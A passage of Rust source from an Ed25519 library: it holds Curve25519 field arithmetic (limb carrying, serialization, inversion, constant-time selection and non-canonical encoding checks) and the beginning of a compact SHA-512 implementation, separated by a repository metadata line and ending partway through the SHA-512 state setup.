/// by 19 (0x13), since 2^255 ≡ 19 (mod p).
pub fn fiat_25519_carry(out1: &mut [u64; 5], arg1: &[u64; 5]) {
    // First pass: ripple carries upward.
    let x1: u64 = (arg1[0]);
    let x2: u64 = ((x1 >> 51).wrapping_add((arg1[1])));
    let x3: u64 = ((x2 >> 51).wrapping_add((arg1[2])));
    let x4: u64 = ((x3 >> 51).wrapping_add((arg1[3])));
    let x5: u64 = ((x4 >> 51).wrapping_add((arg1[4])));
    // Fold the top carry into limb 0, then one more short carry pass.
    let x6: u64 = ((x1 & 0x7ffffffffffff).wrapping_add(((x5 >> 51).wrapping_mul(0x13))));
    let x7: u64 = ((((x6 >> 51) as fiat_25519_u1) as u64).wrapping_add((x2 & 0x7ffffffffffff)));
    let x8: u64 = (x6 & 0x7ffffffffffff);
    let x9: u64 = (x7 & 0x7ffffffffffff);
    let x10: u64 = ((((x7 >> 51) as fiat_25519_u1) as u64).wrapping_add((x3 & 0x7ffffffffffff)));
    let x11: u64 = (x4 & 0x7ffffffffffff);
    let x12: u64 = (x5 & 0x7ffffffffffff);
    out1[0] = x8;
    out1[1] = x9;
    out1[2] = x10;
    out1[3] = x11;
    out1[4] = x12;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Limb-wise field addition without carry propagation; the result is
/// loosely reduced (callers run a carry pass when needed).
pub fn fiat_25519_add(out1: &mut [u64; 5], arg1: &[u64; 5], arg2: &[u64; 5]) {
    for i in 0..5 {
        out1[i] = arg1[i].wrapping_add(arg2[i]);
    }
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Limb-wise field subtraction. 2*p is added limb-wise first so the
/// per-limb difference cannot underflow for loosely-reduced inputs.
pub fn fiat_25519_sub(out1: &mut [u64; 5], arg1: &[u64; 5], arg2: &[u64; 5]) {
    // Limb representation of 2*p = 2^256 - 38 in the 51-bit radix.
    const TWO_P: [u64; 5] = [
        0xfffffffffffda,
        0xffffffffffffe,
        0xffffffffffffe,
        0xffffffffffffe,
        0xffffffffffffe,
    ];
    for i in 0..5 {
        out1[i] = TWO_P[i].wrapping_add(arg1[i]).wrapping_sub(arg2[i]);
    }
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Field negation computed as `2*p - x`, limb-wise, so every resulting
/// limb stays non-negative for loosely-reduced inputs.
pub fn fiat_25519_opp(out1: &mut [u64; 5], arg1: &[u64; 5]) {
    const TWO_P: [u64; 5] = [
        0xfffffffffffda,
        0xffffffffffffe,
        0xffffffffffffe,
        0xffffffffffffe,
        0xffffffffffffe,
    ];
    for i in 0..5 {
        out1[i] = TWO_P[i].wrapping_sub(arg1[i]);
    }
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_selectznz(
out1: &mut [u64; 5],
arg1: fiat_25519_u1,
arg2: &[u64; 5],
arg3: &[u64; 5],
) {
let mut x1: u64 = 0;
fiat_25519_cmovznz_u64(&mut x1, arg1, (arg2[0]), (arg3[0]));
let mut x2: u64 = 0;
fiat_25519_cmovznz_u64(&mut x2, arg1, (arg2[1]), (arg3[1]));
let mut x3: u64 = 0;
fiat_25519_cmovznz_u64(&mut x3, arg1, (arg2[2]), (arg3[2]));
let mut x4: u64 = 0;
fiat_25519_cmovznz_u64(&mut x4, arg1, (arg2[3]), (arg3[3]));
let mut x5: u64 = 0;
fiat_25519_cmovznz_u64(&mut x5, arg1, (arg2[4]), (arg3[4]));
out1[0] = x1;
out1[1] = x2;
out1[2] = x3;
out1[3] = x4;
out1[4] = x5;
}
/// Serializes a (carried) field element to its canonical 32-byte
/// little-endian encoding: first conditionally subtracts p via the
/// subborrow/cmovznz/addcarry prologue, then packs the five 51-bit limbs
/// into bytes. Machine-generated fiat-crypto style code — do not hand-edit.
pub fn fiat_25519_to_bytes(out1: &mut [u8; 32], arg1: &[u64; 5]) {
    // Tentatively subtract p = 2^255 - 19 limb-wise.
    let mut x1: u64 = 0;
    let mut x2: fiat_25519_u1 = 0;
    fiat_25519_subborrowx_u51(&mut x1, &mut x2, 0x0, (arg1[0]), 0x7ffffffffffed);
    let mut x3: u64 = 0;
    let mut x4: fiat_25519_u1 = 0;
    fiat_25519_subborrowx_u51(&mut x3, &mut x4, x2, (arg1[1]), 0x7ffffffffffff);
    let mut x5: u64 = 0;
    let mut x6: fiat_25519_u1 = 0;
    fiat_25519_subborrowx_u51(&mut x5, &mut x6, x4, (arg1[2]), 0x7ffffffffffff);
    let mut x7: u64 = 0;
    let mut x8: fiat_25519_u1 = 0;
    fiat_25519_subborrowx_u51(&mut x7, &mut x8, x6, (arg1[3]), 0x7ffffffffffff);
    let mut x9: u64 = 0;
    let mut x10: fiat_25519_u1 = 0;
    fiat_25519_subborrowx_u51(&mut x9, &mut x10, x8, (arg1[4]), 0x7ffffffffffff);
    // If the subtraction borrowed (input < p), add p back in constant time.
    let mut x11: u64 = 0;
    fiat_25519_cmovznz_u64(&mut x11, x10, 0x0_u64, 0xffffffffffffffff);
    let mut x12: u64 = 0;
    let mut x13: fiat_25519_u1 = 0;
    fiat_25519_addcarryx_u51(&mut x12, &mut x13, 0x0, x1, (x11 & 0x7ffffffffffed));
    let mut x14: u64 = 0;
    let mut x15: fiat_25519_u1 = 0;
    fiat_25519_addcarryx_u51(&mut x14, &mut x15, x13, x3, (x11 & 0x7ffffffffffff));
    let mut x16: u64 = 0;
    let mut x17: fiat_25519_u1 = 0;
    fiat_25519_addcarryx_u51(&mut x16, &mut x17, x15, x5, (x11 & 0x7ffffffffffff));
    let mut x18: u64 = 0;
    let mut x19: fiat_25519_u1 = 0;
    fiat_25519_addcarryx_u51(&mut x18, &mut x19, x17, x7, (x11 & 0x7ffffffffffff));
    let mut x20: u64 = 0;
    let mut x21: fiat_25519_u1 = 0;
    fiat_25519_addcarryx_u51(&mut x20, &mut x21, x19, x9, (x11 & 0x7ffffffffffff));
    // Pre-shift limbs 1..4 so byte extraction below lines up on bit 8*k.
    let x22: u64 = (x20 << 4);
    let x23: u64 = (x18.wrapping_mul(0x2_u64));
    let x24: u64 = (x16 << 6);
    let x25: u64 = (x14 << 3);
    // Peel off bytes, folding each limb's leftover bits into the next one.
    let x26: u8 = ((x12 & 0xff_u64) as u8);
    let x27: u64 = (x12 >> 8);
    let x28: u8 = ((x27 & 0xff_u64) as u8);
    let x29: u64 = (x27 >> 8);
    let x30: u8 = ((x29 & 0xff_u64) as u8);
    let x31: u64 = (x29 >> 8);
    let x32: u8 = ((x31 & 0xff_u64) as u8);
    let x33: u64 = (x31 >> 8);
    let x34: u8 = ((x33 & 0xff_u64) as u8);
    let x35: u64 = (x33 >> 8);
    let x36: u8 = ((x35 & 0xff_u64) as u8);
    let x37: u8 = ((x35 >> 8) as u8);
    let x38: u64 = (x25.wrapping_add((x37 as u64)));
    let x39: u8 = ((x38 & 0xff_u64) as u8);
    let x40: u64 = (x38 >> 8);
    let x41: u8 = ((x40 & 0xff_u64) as u8);
    let x42: u64 = (x40 >> 8);
    let x43: u8 = ((x42 & 0xff_u64) as u8);
    let x44: u64 = (x42 >> 8);
    let x45: u8 = ((x44 & 0xff_u64) as u8);
    let x46: u64 = (x44 >> 8);
    let x47: u8 = ((x46 & 0xff_u64) as u8);
    let x48: u64 = (x46 >> 8);
    let x49: u8 = ((x48 & 0xff_u64) as u8);
    let x50: u8 = ((x48 >> 8) as u8);
    let x51: u64 = (x24.wrapping_add((x50 as u64)));
    let x52: u8 = ((x51 & 0xff_u64) as u8);
    let x53: u64 = (x51 >> 8);
    let x54: u8 = ((x53 & 0xff_u64) as u8);
    let x55: u64 = (x53 >> 8);
    let x56: u8 = ((x55 & 0xff_u64) as u8);
    let x57: u64 = (x55 >> 8);
    let x58: u8 = ((x57 & 0xff_u64) as u8);
    let x59: u64 = (x57 >> 8);
    let x60: u8 = ((x59 & 0xff_u64) as u8);
    let x61: u64 = (x59 >> 8);
    let x62: u8 = ((x61 & 0xff_u64) as u8);
    let x63: u64 = (x61 >> 8);
    let x64: u8 = ((x63 & 0xff_u64) as u8);
    let x65: fiat_25519_u1 = ((x63 >> 8) as fiat_25519_u1);
    let x66: u64 = (x23.wrapping_add((x65 as u64)));
    let x67: u8 = ((x66 & 0xff_u64) as u8);
    let x68: u64 = (x66 >> 8);
    let x69: u8 = ((x68 & 0xff_u64) as u8);
    let x70: u64 = (x68 >> 8);
    let x71: u8 = ((x70 & 0xff_u64) as u8);
    let x72: u64 = (x70 >> 8);
    let x73: u8 = ((x72 & 0xff_u64) as u8);
    let x74: u64 = (x72 >> 8);
    let x75: u8 = ((x74 & 0xff_u64) as u8);
    let x76: u64 = (x74 >> 8);
    let x77: u8 = ((x76 & 0xff_u64) as u8);
    let x78: u8 = ((x76 >> 8) as u8);
    let x79: u64 = (x22.wrapping_add((x78 as u64)));
    let x80: u8 = ((x79 & 0xff_u64) as u8);
    let x81: u64 = (x79 >> 8);
    let x82: u8 = ((x81 & 0xff_u64) as u8);
    let x83: u64 = (x81 >> 8);
    let x84: u8 = ((x83 & 0xff_u64) as u8);
    let x85: u64 = (x83 >> 8);
    let x86: u8 = ((x85 & 0xff_u64) as u8);
    let x87: u64 = (x85 >> 8);
    let x88: u8 = ((x87 & 0xff_u64) as u8);
    let x89: u64 = (x87 >> 8);
    let x90: u8 = ((x89 & 0xff_u64) as u8);
    let x91: u8 = ((x89 >> 8) as u8);
    // Write the 32 little-endian output bytes.
    out1[0] = x26;
    out1[1] = x28;
    out1[2] = x30;
    out1[3] = x32;
    out1[4] = x34;
    out1[5] = x36;
    out1[6] = x39;
    out1[7] = x41;
    out1[8] = x43;
    out1[9] = x45;
    out1[10] = x47;
    out1[11] = x49;
    out1[12] = x52;
    out1[13] = x54;
    out1[14] = x56;
    out1[15] = x58;
    out1[16] = x60;
    out1[17] = x62;
    out1[18] = x64;
    out1[19] = x67;
    out1[20] = x69;
    out1[21] = x71;
    out1[22] = x73;
    out1[23] = x75;
    out1[24] = x77;
    out1[25] = x80;
    out1[26] = x82;
    out1[27] = x84;
    out1[28] = x86;
    out1[29] = x88;
    out1[30] = x90;
    out1[31] = x91;
}
/// An element of the field GF(2^255 - 19), stored as five little-endian
/// limbs of up to 51 bits each (possibly loosely reduced).
#[derive(Clone, Default, Copy)]
pub struct Fe(pub [u64; 5]);
impl PartialEq for Fe {
fn eq(&self, other: &Fe) -> bool {
let &Fe(self_elems) = self;
let &Fe(other_elems) = other;
self_elems == other_elems
}
}
// Limb equality is a total equivalence (no NaN-like values), so `Eq` is sound.
impl Eq for Fe {}
// Field constants, as five 51-bit little-endian limbs.
pub static FE_ZERO: Fe = Fe([0, 0, 0, 0, 0]);
pub static FE_ONE: Fe = Fe([1, 0, 0, 0, 0]);
// Square root of -1 in the field (per the name) — used by square-root /
// point-decompression code elsewhere in the crate; TODO confirm against RFC 8032.
pub static FE_SQRTM1: Fe = Fe([
    1718705420411056,
    234908883556509,
    2233514472574048,
    2117202627021982,
    765476049583133,
]);
// Edwards curve constant d (per the name); TODO confirm value against RFC 8032.
pub(crate) static FE_D: Fe = Fe([
    929955233495203,
    466365720129213,
    1662059464998953,
    2033849074728123,
    1442794654840575,
]);
// 2*d (per the name), used in point addition formulas.
pub(crate) static FE_D2: Fe = Fe([
    1859910466990425,
    932731440258426,
    1072319116312658,
    1815898335770999,
    633789495995903,
]);
// The X25519 base point u = 9.
#[cfg(feature = "x25519")]
pub(crate) static FE_CURVE25519_BASEPOINT: Fe = Fe([9, 0, 0, 0, 0]);
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Reads the first 8 bytes of `s` as a little-endian u64.
/// Panics if `s` has fewer than 8 bytes (same as the open-coded version).
fn load_8u(s: &[u8]) -> u64 {
    (0..8).fold(0u64, |word, i| word | ((s[i] as u64) << (8 * i)))
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Reads the first 4 bytes of `s` as a little-endian value, zero-extended
/// to u64. Panics if `s` has fewer than 4 bytes.
pub fn load_4u(s: &[u8]) -> u64 {
    (0..4).fold(0u64, |word, i| word | ((s[i] as u64) << (8 * i)))
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Reads 4 little-endian bytes and reinterprets the (always non-negative,
/// < 2^32) value as i64, for use in signed scalar arithmetic.
pub fn load_4i(s: &[u8]) -> i64 {
    load_4u(s) as i64
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Reads the first 3 bytes of `s` as a little-endian value, zero-extended
/// to u64. Panics if `s` has fewer than 3 bytes.
pub fn load_3u(s: &[u8]) -> u64 {
    (0..3).fold(0u64, |word, i| word | ((s[i] as u64) << (8 * i)))
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Reads 3 little-endian bytes and reinterprets the (always non-negative,
/// < 2^24) value as i64, for use in signed scalar arithmetic.
pub fn load_3i(s: &[u8]) -> i64 {
    load_3u(s) as i64
}
impl Add for Fe {
    type Output = Fe;
    /// Limb-wise field addition; the result is left loosely reduced.
    fn add(self, rhs: Fe) -> Fe {
        let mut sum = Fe::default();
        fiat_25519_add(&mut sum.0, &self.0, &rhs.0);
        sum
    }
}
impl Sub for Fe {
    type Output = Fe;
    /// Field subtraction; the raw limb difference is carried before returning.
    fn sub(self, rhs: Fe) -> Fe {
        let mut diff = Fe::default();
        fiat_25519_sub(&mut diff.0, &self.0, &rhs.0);
        diff.carry()
    }
}
impl Mul for Fe {
    type Output = Fe;
    /// Field multiplication; reduction is built into the carrying multiply.
    fn mul(self, rhs: Fe) -> Fe {
        let mut prod = Fe::default();
        fiat_25519_carry_mul(&mut prod.0, &self.0, &rhs.0);
        prod
    }
}
impl Fe {
    /// Deserializes 32 little-endian bytes into five 51-bit limbs.
    /// Overlapping 8-byte reads at offsets 0/6/12/19/24 (with shifts
    /// 0/3/6/1/12) pick up successive 51-bit windows; the encoding's top
    /// bit is dropped by the mask.
    ///
    /// # Panics
    /// Panics if `s` is not exactly 32 bytes.
    pub fn from_bytes(s: &[u8]) -> Fe {
        if s.len() != 32 {
            panic!("Invalid compressed length")
        }
        let mut h = Fe::default();
        let mask = 0x7ffffffffffff;
        h.0[0] = load_8u(&s[0..]) & mask;
        h.0[1] = (load_8u(&s[6..]) >> 3) & mask;
        h.0[2] = (load_8u(&s[12..]) >> 6) & mask;
        h.0[3] = (load_8u(&s[19..]) >> 1) & mask;
        h.0[4] = (load_8u(&s[24..]) >> 12) & mask;
        h
    }
    /// Serializes to the canonical 32-byte little-endian encoding
    /// (carries first; `fiat_25519_to_bytes` handles the final mod-p step).
    pub fn to_bytes(&self) -> [u8; 32] {
        let &Fe(es) = &self.carry();
        let mut s_ = [0u8; 32];
        fiat_25519_to_bytes(&mut s_, &es);
        s_
    }
    /// Returns a copy with every limb carried back below 2^51.
    pub fn carry(&self) -> Fe {
        let mut h = Fe::default();
        fiat_25519_carry(&mut h.0, &self.0);
        h
    }
    /// Constant-time conditional assignment: sets `self = *other` when
    /// `do_swap` is 1, leaves `self` unchanged when it is 0.
    pub fn maybe_set(&mut self, other: &Fe, do_swap: u8) {
        let &mut Fe(f) = self;
        let &Fe(g) = other;
        let mut t = [0u64; 5];
        fiat_25519_selectznz(&mut t, do_swap, &f, &g);
        self.0 = t
    }
    /// Field squaring (carried).
    pub fn square(&self) -> Fe {
        let &Fe(f) = &self;
        let mut h = Fe::default();
        fiat_25519_carry_square(&mut h.0, f);
        h
    }
    /// Returns `2 * self^2`.
    pub fn square_and_double(&self) -> Fe {
        let h = self.square();
        (h + h)
    }
    /// Multiplicative inverse via Fermat's little theorem (z^(p-2)),
    /// computed with the standard Curve25519 addition chain; the suffixes
    /// `_a_b` track the exponent range covered (e.g. `z_10_5` = z^(2^10 - 2^5)).
    pub fn invert(&self) -> Fe {
        let z1 = *self;
        let z2 = z1.square();
        let z8 = z2.square().square();
        let z9 = z1 * z8;
        let z11 = z2 * z9;
        let z22 = z11.square();
        let z_5_0 = z9 * z22;
        let z_10_5 = (0..5).fold(z_5_0, |z_5_n, _| z_5_n.square());
        let z_10_0 = z_10_5 * z_5_0;
        let z_20_10 = (0..10).fold(z_10_0, |x, _| x.square());
        let z_20_0 = z_20_10 * z_10_0;
        let z_40_20 = (0..20).fold(z_20_0, |x, _| x.square());
        let z_40_0 = z_40_20 * z_20_0;
        let z_50_10 = (0..10).fold(z_40_0, |x, _| x.square());
        let z_50_0 = z_50_10 * z_10_0;
        let z_100_50 = (0..50).fold(z_50_0, |x, _| x.square());
        let z_100_0 = z_100_50 * z_50_0;
        let z_200_100 = (0..100).fold(z_100_0, |x, _| x.square());
        let z_200_0 = z_200_100 * z_100_0;
        let z_250_50 = (0..50).fold(z_200_0, |x, _| x.square());
        let z_250_0 = z_250_50 * z_50_0;
        let z_255_5 = (0..5).fold(z_250_0, |x, _| x.square());
        let z_255_21 = z_255_5 * z11;
        z_255_21
    }
    /// True iff the canonical encoding is all-zero bytes.
    pub fn is_zero(&self) -> bool {
        self.to_bytes().iter().fold(0, |acc, x| acc | x) == 0
    }
    /// "Negative" in the Ed25519 sense: the low bit of the canonical encoding.
    pub fn is_negative(&self) -> bool {
        (self.to_bytes()[0] & 1) != 0
    }
    /// Field negation (-self mod p).
    pub fn neg(&self) -> Fe {
        let &Fe(f) = &self;
        let mut h = Fe::default();
        fiat_25519_opp(&mut h.0, f);
        h
    }
    /// Raises to the power 2^252 - 3 (per the `z_252_3` chain and the name),
    /// the exponent used in square-root computation for point decompression.
    pub fn pow25523(&self) -> Fe {
        let z2 = self.square();
        let z8 = (0..2).fold(z2, |x, _| x.square());
        let z9 = *self * z8;
        let z11 = z2 * z9;
        let z22 = z11.square();
        let z_5_0 = z9 * z22;
        let z_10_5 = (0..5).fold(z_5_0, |x, _| x.square());
        let z_10_0 = z_10_5 * z_5_0;
        let z_20_10 = (0..10).fold(z_10_0, |x, _| x.square());
        let z_20_0 = z_20_10 * z_10_0;
        let z_40_20 = (0..20).fold(z_20_0, |x, _| x.square());
        let z_40_0 = z_40_20 * z_20_0;
        let z_50_10 = (0..10).fold(z_40_0, |x, _| x.square());
        let z_50_0 = z_50_10 * z_10_0;
        let z_100_50 = (0..50).fold(z_50_0, |x, _| x.square());
        let z_100_0 = z_100_50 * z_50_0;
        let z_200_100 = (0..100).fold(z_100_0, |x, _| x.square());
        let z_200_0 = z_200_100 * z_100_0;
        let z_250_50 = (0..50).fold(z_200_0, |x, _| x.square());
        let z_250_0 = z_250_50 * z_50_0;
        let z_252_2 = (0..2).fold(z_250_0, |x, _| x.square());
        let z_252_3 = z_252_2 * *self;
        z_252_3
    }
    /// Constant-time conditional swap of two element pairs: swaps
    /// (a0,b0) and (a1,b1) when `c` is 1, leaves them unchanged when 0,
    /// using XOR-mask arithmetic with no data-dependent branches.
    #[cfg(feature = "x25519")]
    #[inline]
    pub fn cswap2(a0: &mut Fe, b0: &mut Fe, a1: &mut Fe, b1: &mut Fe, c: u8) {
        let mask: u64 = 0u64.wrapping_sub(c as _);
        let mut x0 = *a0;
        let mut x1 = *a1;
        for i in 0..5 {
            x0.0[i] ^= b0.0[i];
            x1.0[i] ^= b1.0[i];
        }
        for i in 0..5 {
            x0.0[i] &= mask;
            x1.0[i] &= mask;
        }
        for i in 0..5 {
            a0.0[i] ^= x0.0[i];
            b0.0[i] ^= x0.0[i];
            a1.0[i] ^= x1.0[i];
            b1.0[i] ^= x1.0[i];
        }
    }
    /// Multiplies by a small 32-bit scalar, carrying between limbs and
    /// folding the final carry into limb 0 (times 19).
    #[cfg(feature = "x25519")]
    #[inline]
    pub fn mul32(&self, n: u32) -> Fe {
        let sn = n as u128;
        let mut fe = Fe::default();
        // NOTE(review): x starts at 8 rather than 0; the first iteration
        // only uses x >> 51, which is 0 either way, so the value is inert.
        let mut x: u128 = 8;
        for i in 0..5 {
            x = self.0[i] as u128 * sn + (x >> 51);
            fe.0[i] = (x as u64) & 0x7ffffffffffff;
        }
        fe.0[0] += (x >> 51) as u64 * 19;
        fe
    }
    /// Rejects encodings that are not canonical, i.e. whose 255-bit value
    /// is >= p = 2^255 - 19: `c` is 0 only when bytes 1..=31 are maximal
    /// (s[31] == 0x7f, s[1..=30] all 0xff) and `d` is 0 only when
    /// s[0] >= 0xed; both together mean value >= p.
    ///
    /// # Panics
    /// Panics if `s` is not exactly 32 bytes.
    pub fn reject_noncanonical(s: &[u8]) -> Result<(), Error> {
        if s.len() != 32 {
            panic!("Invalid compressed length")
        }
        let mut c = s[31];
        c ^= 0x7f;
        let mut i: usize = 30;
        while i > 0 {
            c |= s[i] ^ 0xff;
            i -= 1;
        }
        c = ((c as u16).wrapping_sub(1) >> 8) as u8;
        let d = (((0xed - 1) as u16).wrapping_sub(s[0] as u16) >> 8) as u8;
        if c & d & 1 == 0 {
            Ok(())
        } else {
            Err(Error::NonCanonical)
        }
    }
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/sha512.rs | src/sha512.rs | //! A small, self-contained SHA512 implementation
//! (C) Frank Denis, public domain
#![allow(
non_snake_case,
clippy::cast_lossless,
clippy::eq_op,
clippy::identity_op,
clippy::many_single_char_names,
clippy::unreadable_literal
)]
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn load_be(base: &[u8], offset: usize) -> u64 {
let addr = &base[offset..];
(addr[7] as u64)
| (addr[6] as u64) << 8
| (addr[5] as u64) << 16
| (addr[4] as u64) << 24
| (addr[3] as u64) << 32
| (addr[2] as u64) << 40
| (addr[1] as u64) << 48
| (addr[0] as u64) << 56
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn store_be(base: &mut [u8], offset: usize, x: u64) {
let addr = &mut base[offset..];
addr[7] = x as u8;
addr[6] = (x >> 8) as u8;
addr[5] = (x >> 16) as u8;
addr[4] = (x >> 24) as u8;
addr[3] = (x >> 32) as u8;
addr[2] = (x >> 40) as u8;
addr[1] = (x >> 48) as u8;
addr[0] = (x >> 56) as u8;
}
struct W([u64; 16]);
#[derive(Copy, Clone)]
struct State([u64; 8]);
impl W {
fn new(input: &[u8]) -> Self {
let mut w = [0u64; 16];
for (i, e) in w.iter_mut().enumerate() {
*e = load_be(input, i * 8)
}
W(w)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Ch(x: u64, y: u64, z: u64) -> u64 {
(x & y) ^ (!x & z)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Maj(x: u64, y: u64, z: u64) -> u64 {
(x & y) ^ (x & z) ^ (y & z)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Sigma0(x: u64) -> u64 {
x.rotate_right(28) ^ x.rotate_right(34) ^ x.rotate_right(39)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn Sigma1(x: u64) -> u64 {
x.rotate_right(14) ^ x.rotate_right(18) ^ x.rotate_right(41)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn sigma0(x: u64) -> u64 {
x.rotate_right(1) ^ x.rotate_right(8) ^ (x >> 7)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn sigma1(x: u64) -> u64 {
x.rotate_right(19) ^ x.rotate_right(61) ^ (x >> 6)
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn M(&mut self, a: usize, b: usize, c: usize, d: usize) {
let w = &mut self.0;
w[a] = w[a]
.wrapping_add(Self::sigma1(w[b]))
.wrapping_add(w[c])
.wrapping_add(Self::sigma0(w[d]));
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn expand(&mut self) {
self.M(0, (0 + 14) & 15, (0 + 9) & 15, (0 + 1) & 15);
self.M(1, (1 + 14) & 15, (1 + 9) & 15, (1 + 1) & 15);
self.M(2, (2 + 14) & 15, (2 + 9) & 15, (2 + 1) & 15);
self.M(3, (3 + 14) & 15, (3 + 9) & 15, (3 + 1) & 15);
self.M(4, (4 + 14) & 15, (4 + 9) & 15, (4 + 1) & 15);
self.M(5, (5 + 14) & 15, (5 + 9) & 15, (5 + 1) & 15);
self.M(6, (6 + 14) & 15, (6 + 9) & 15, (6 + 1) & 15);
self.M(7, (7 + 14) & 15, (7 + 9) & 15, (7 + 1) & 15);
self.M(8, (8 + 14) & 15, (8 + 9) & 15, (8 + 1) & 15);
self.M(9, (9 + 14) & 15, (9 + 9) & 15, (9 + 1) & 15);
self.M(10, (10 + 14) & 15, (10 + 9) & 15, (10 + 1) & 15);
self.M(11, (11 + 14) & 15, (11 + 9) & 15, (11 + 1) & 15);
self.M(12, (12 + 14) & 15, (12 + 9) & 15, (12 + 1) & 15);
self.M(13, (13 + 14) & 15, (13 + 9) & 15, (13 + 1) & 15);
self.M(14, (14 + 14) & 15, (14 + 9) & 15, (14 + 1) & 15);
self.M(15, (15 + 14) & 15, (15 + 9) & 15, (15 + 1) & 15);
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline(always))]
fn F(&mut self, state: &mut State, i: usize, k: u64) {
let t = &mut state.0;
t[(16 - i + 7) & 7] = t[(16 - i + 7) & 7]
.wrapping_add(Self::Sigma1(t[(16 - i + 4) & 7]))
.wrapping_add(Self::Ch(
t[(16 - i + 4) & 7],
t[(16 - i + 5) & 7],
t[(16 - i + 6) & 7],
))
.wrapping_add(k)
.wrapping_add(self.0[i]);
t[(16 - i + 3) & 7] = t[(16 - i + 3) & 7].wrapping_add(t[(16 - i + 7) & 7]);
t[(16 - i + 7) & 7] = t[(16 - i + 7) & 7]
.wrapping_add(Self::Sigma0(t[(16 - i + 0) & 7]))
.wrapping_add(Self::Maj(
t[(16 - i + 0) & 7],
t[(16 - i + 1) & 7],
t[(16 - i + 2) & 7],
));
}
fn G(&mut self, state: &mut State, s: usize) {
const ROUND_CONSTANTS: [u64; 80] = [
0x428a2f98d728ae22,
0x7137449123ef65cd,
0xb5c0fbcfec4d3b2f,
0xe9b5dba58189dbbc,
0x3956c25bf348b538,
0x59f111f1b605d019,
0x923f82a4af194f9b,
0xab1c5ed5da6d8118,
0xd807aa98a3030242,
0x12835b0145706fbe,
0x243185be4ee4b28c,
0x550c7dc3d5ffb4e2,
0x72be5d74f27b896f,
0x80deb1fe3b1696b1,
0x9bdc06a725c71235,
0xc19bf174cf692694,
0xe49b69c19ef14ad2,
0xefbe4786384f25e3,
0x0fc19dc68b8cd5b5,
0x240ca1cc77ac9c65,
0x2de92c6f592b0275,
0x4a7484aa6ea6e483,
0x5cb0a9dcbd41fbd4,
0x76f988da831153b5,
0x983e5152ee66dfab,
0xa831c66d2db43210,
0xb00327c898fb213f,
0xbf597fc7beef0ee4,
0xc6e00bf33da88fc2,
0xd5a79147930aa725,
0x06ca6351e003826f,
0x142929670a0e6e70,
0x27b70a8546d22ffc,
0x2e1b21385c26c926,
0x4d2c6dfc5ac42aed,
0x53380d139d95b3df,
0x650a73548baf63de,
0x766a0abb3c77b2a8,
0x81c2c92e47edaee6,
0x92722c851482353b,
0xa2bfe8a14cf10364,
0xa81a664bbc423001,
0xc24b8b70d0f89791,
0xc76c51a30654be30,
0xd192e819d6ef5218,
0xd69906245565a910,
0xf40e35855771202a,
0x106aa07032bbd1b8,
0x19a4c116b8d2d0c8,
0x1e376c085141ab53,
0x2748774cdf8eeb99,
0x34b0bcb5e19b48a8,
0x391c0cb3c5c95a63,
0x4ed8aa4ae3418acb,
0x5b9cca4f7763e373,
0x682e6ff3d6b2b8a3,
0x748f82ee5defb2fc,
0x78a5636f43172f60,
0x84c87814a1f0ab72,
0x8cc702081a6439ec,
0x90befffa23631e28,
0xa4506cebde82bde9,
0xbef9a3f7b2c67915,
0xc67178f2e372532b,
0xca273eceea26619c,
0xd186b8c721c0c207,
0xeada7dd6cde0eb1e,
0xf57d4f7fee6ed178,
0x06f067aa72176fba,
0x0a637dc5a2c898a6,
0x113f9804bef90dae,
0x1b710b35131c471b,
0x28db77f523047d84,
0x32caab7b40c72493,
0x3c9ebe0a15c9bebc,
0x431d67c49c100d4c,
0x4cc5d4becb3e42b6,
0x597f299cfc657e2a,
0x5fcb6fab3ad6faec,
0x6c44198c4a475817,
];
let rc = &ROUND_CONSTANTS[s * 16..];
self.F(state, 0, rc[0]);
self.F(state, 1, rc[1]);
self.F(state, 2, rc[2]);
self.F(state, 3, rc[3]);
self.F(state, 4, rc[4]);
self.F(state, 5, rc[5]);
self.F(state, 6, rc[6]);
self.F(state, 7, rc[7]);
self.F(state, 8, rc[8]);
self.F(state, 9, rc[9]);
self.F(state, 10, rc[10]);
self.F(state, 11, rc[11]);
self.F(state, 12, rc[12]);
self.F(state, 13, rc[13]);
self.F(state, 14, rc[14]);
self.F(state, 15, rc[15]);
}
}
impl State {
fn new() -> Self {
const IV: [u8; 64] = [
